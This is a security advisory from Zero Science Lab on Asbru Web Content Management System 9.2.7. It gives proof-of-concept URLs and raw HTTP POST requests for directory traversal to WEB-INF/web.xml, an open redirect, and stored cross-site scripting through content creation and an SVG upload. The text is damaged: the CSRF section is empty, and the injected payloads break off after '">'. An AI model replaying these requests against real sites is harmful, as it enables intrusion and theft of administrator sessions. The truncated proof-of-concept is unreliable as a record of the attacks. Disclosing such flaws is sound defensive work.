Asbru Web Content Management System v9.2.7 Multiple Vulnerabilities Vendor: Asbru Ltd. Product web page: http://www.asbrusoft.com Affected version: 9.2.7 Summary: Ready to use, full-featured, database-driven web content management system (CMS) with integrated community, databases, e-commerce and statistics modules for creating, publishing and managing rich and user-friendly Internet, Extranet and Intranet websites. Desc: Asbru WCM suffers from multiple vulnerabilities including Cross-Site Request Forgery, Stored Cross-Site Scripting, Open Redirect and Information Disclosure. Tested on : Apache Tomcat/5.5.23 Apache/2.2.3 (CentOS) Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2016-5314 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5314.php 09.03.2016 -- #1 Directory Traversal: -------------------- http://10.0.0.7/../../../../../WEB-INF/web.xml #2 Open Redirect: -------------- http://10.0.0.7/login_post.jsp?url=http://www.zeroscience.mk #3 Cross-Site Request Forgery (Add 'administrator' With Full Privileges): ----------------------------------------------------------------------

#4 Stored Cross-Site Scripting: ---------------------------- a) POST /webadmin/content/create_post.jsp?id=&redirect= HTTP/1.1 Host: 10.0.0.7 ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="webeditor_stylesheet" /stylesheet.jsp?id=1,1&device=&useragent=& ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="restore" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="archive" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="publish" Save & Publish ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="scheduled_publish" 2016-03-09 13:29 ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="scheduled_unpublish" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="checkedout" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="revision" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="title" "> ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="searchable" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="menuitem" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="file"; filename="test.svg" Content-Type: image/svg+xml testsvgxxefailed ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="file_data" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="server_filename" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="contentdelivery" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="image1" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="image2" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="image3" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="metainfo" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="segmentation" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="author" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="description" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="keywords" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="metainfoname" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="segmentationname" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="segmentationvalue" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="contentpackage" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="contentclass" image ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="contentgroup" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="contenttype" Photos ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="version_master" 0 ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="version" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="device" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="usersegment" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="usertest" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="users_group" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="users_type" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="users_users" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="creators_group" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="creators_type" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="creators_users" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="editors_group" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="editors_type" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="editors_users" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="publishers_group" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="publishers_type" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="publishers_users" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="developers_group" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="developers_type" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="developers_users" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="administrators_group" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="administrators_type" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="administrators_users" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="page_top" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="page_up" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="page_previous" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="page_next" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="page_first" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="page_last" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="related" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="selectrelated" ------WebKitFormBoundarygqlN2AtccVFqx0YN-- b) POST /webadmin/fileformats/create_post.jsp HTTP/1.1 Host: 10.0.0.7 filenameextension=">